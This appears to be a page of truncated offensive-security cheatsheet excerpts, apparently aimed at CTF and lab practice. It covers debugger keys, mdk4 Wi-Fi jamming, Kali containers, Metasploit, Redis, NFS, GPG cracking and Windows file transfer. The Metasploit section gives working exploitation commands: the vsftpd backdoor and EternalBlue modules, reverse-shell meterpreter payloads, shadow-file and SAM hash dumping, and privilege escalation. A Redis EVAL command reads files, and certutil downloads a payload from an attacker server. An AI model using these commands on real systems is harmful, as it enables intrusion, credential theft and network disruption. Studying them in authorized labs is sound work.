Cheatsheets

Execution control F7 runs step into so it enters the next function F8 runs step over so it goes to next instruction without entering function F9 runs continue process until breakpoint or crash Ctrl + F2 stops the debugger Ctrl + F9 restarts the process Breakpoints F2 toggles breakpoint on current line Shift + F2 deletes all breakpoints Alt + B opens breakpoint list Navigation during debug EIP RIP highlighted shows current instruction Space switches graph view and linear view G jumps to address Esc goes back Registers and memory Alt + R opens registers window Alt + M opens memory window Alt + S opens stack view Ctrl + Alt + R refreshes registers Practical CTF flow Press F9 to run program Hit F2 on main or check function Use F8 to trace logic Use F7 only when entering crypto or check routine Watch registers and stack Laptop Friendly Tip If F keys are painful then remap: ...

With the mdk4 tool, you can jam Wi-Fi networks in various ways. This guide will walk you through the installation, setup, and usage of mdk4, including examples for different attacks. 1. Installation If mdk4 is not installed on your system, install it using the following command: sudo apt-get install mdk4 -y Switching to Root User If you are not the root user, switch to root: sudo su Example: kali@gajendra:~$ sudo su 2. Checking Network Interface Status Check your network interface status to see if it’s in monitor mode: ...

📂 Files Dockerfile + Distrobox commands (single block) FROM docker.io/kalilinux/kali-rolling ENV DEBIAN_FRONTEND=noninteractive TZ=Etc/UTC # install essentials: zsh sudo tzdata chrony util-linux iproute2 RUN apt update && apt install -y \ zsh sudo tzdata chrony util-linux iproute2 \ && useradd -m -s /usr/bin/zsh kali \ && echo "kali:kali" | chpasswd \ && usermod -aG sudo kali \ && apt clean && rm -rf /var/lib/apt/lists/* USER kali WORKDIR /home/kali ENTRYPOINT ["/usr/bin/zsh","-l"] 🛠️ Build Image Run from the folder with the Dockerfile ...

📂 Files Dockerfile (placed in empty folder) FROM kalilinux/kali-rolling ENV DEBIAN_FRONTEND=noninteractive TZ=Etc/UTC # install essentials: zsh sudo tzdata chrony util-linux iproute2 RUN apt update && apt install -y \ zsh sudo tzdata chrony util-linux iproute2 \ && useradd -m -s /usr/bin/zsh kali \ && echo "kali:kali" | chpasswd \ && usermod -aG sudo kali \ && apt clean && rm -rf /var/lib/apt/lists/* USER kali WORKDIR /home/kali ENTRYPOINT ["/usr/bin/zsh","-l"] 🛠️ Build Image Run from the folder with Dockerfile docker build -t kali-zsh-vm:privileged . 🚀 Create and Run Persistent Privileged Container This creates kali-persistent with host timezone and /tmp/test mounted ...

🌐 1.Start Metasploit Console sudo systemctl start postgresql msfconsole Initialize the Metasploit Database (First Time Only) msfdb init 🔍 2. Scanning Targets Quick Target Discovery nmap -sn 10.10.10.0/24 Full Port + Version Scan (Integrated with Metasploit DB) db_nmap -sC -sV -O -Pn 10.10.10.129 View Discovered Hosts & Services hosts services 🪡 3. Exploit Search and Module Use Search by service name or CVE search vsftpd search type:exploit name:smb Load a Module use exploit/unix/ftp/vsftpd_234_backdoor Explore Module Info info # Shows full module details (author, platform, options, etc) show options # Required + optional settings (RHOSTS, LHOST, etc) show advanced # Advanced options like threads, timeouts, proxies show payloads # Compatible payloads for this exploit 💡 4. Linux Exploitation Workflow Example: FTP Backdoor use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 10.10.10.129 set payload cmd/unix/interact run If Shell is Basic: Upgrade python3 -c 'import pty; pty.spawn("/bin/bash")' Or Use Web Delivery use exploit/multi/script/web_delivery set payload linux/x86/meterpreter/reverse_tcp set LHOST <your_ip> set LPORT 4444 run Post-Exploitation (Linux) sessions -i 1 getuid sysinfo Enumerate OS and Configs run post/linux/gather/enum_os run post/linux/gather/enum_configs Dump Password Hashes download /etc/passwd download /etc/shadow john shadow --wordlist=/usr/share/wordlists/rockyou.txt Local Exploit Suggestion run post/multi/recon/local_exploit_suggester Example Local Root Exploit use exploit/linux/local/dirty_cow set SESSION 1 run Confirm Root id whoami 💻 5. Windows Exploitation Workflow Example: EternalBlue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.10.10.130 set LHOST <your_ip> set payload windows/x64/meterpreter/reverse_tcp run Session Handling sessions sessions -i 1 sysinfo getuid Post-Exploitation (Windows) Dump Hashes hashdump load kiwi kiwi_cmd "lsadump::sam" Process Migration ps migrate <pid> getpid Privilege Escalation getsystem Or use: ...

Redis allows the execution of Lua scripts through the EVAL command. If Redis is misconfigured or exposed to attackers, the Lua scripting engine can be used to execute arbitrary commands, including reading files on the system. File Read via EVAL Command You can read the contents of a file (e.g., /flag.txt) using the EVAL command in the Redis interactive shell: EVAL "return io.popen('cat /flag.txt'):read('*a')" 0

This guide walks through analyzing a basic binary (e.g., crackme) using pwndbg. 1. Initial Reconnaissance Start gdb with the binary: $ gdb ./crackme List Functions To see all defined functions in the binary (useful to find main or custom functions): pwndbg> info functions Output Analysis: Look for main. Ignore standard library functions like puts@plt, __isoc99_scanf@plt, _start, etc., unless necessary. Tip: You can filtering with regex: info functions main or info functions ^my_. 2. Static Analysis (Disassembly) Once you identify interesting functions (like main), disassemble them to see the instructions. ...

To scan for rpcbind on a network and check NFS shares, use the following command: sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP # Scanning port 111 for rpcbind and list NFS shares Listing Mounted Partitions on the Network To list the mounted partitions of a network system, use: showmount -e $IP # List the exported directories on the NFS server Mounting rpcbind Directories on Local Machine To mount a remote NFS directory on local machine. In this example, the directory /var is mounted from the remote server with IP 10.10.122.178. ...

To see available keys in your system $ gpg --list-secret-keys If you have a backup.gpg keys with encrypted format. Then you need a key to decode it. If you found the key in some file. Then simple import that file in your syste $ gpg --import private.asc If the private.asc file is in encrypted format then they ask password to decrypt and import to our system. we can also crack private.asc key by extracting hash from it by using john ...

Method 1: Using an HTTP Server Step 1: Start an HTTP server on Linux Open a terminal on your Linux machine and run: sudo python3 -m http.server 80 Step 2: Download the file using certutil on Windows Open Command Prompt or PowerShell on your Windows machine and run: certutil.exe -urlcache -split -f "http://10.10.14.7/msf.exe" Method 2: Using Invoke-WebRequest Step 1: Start an HTTP server on Linux Same as Step 1 in Method 1. Step 2: Download the file using Invoke-WebRequest on Windows Open PowerShell on your Windows machine and run: ...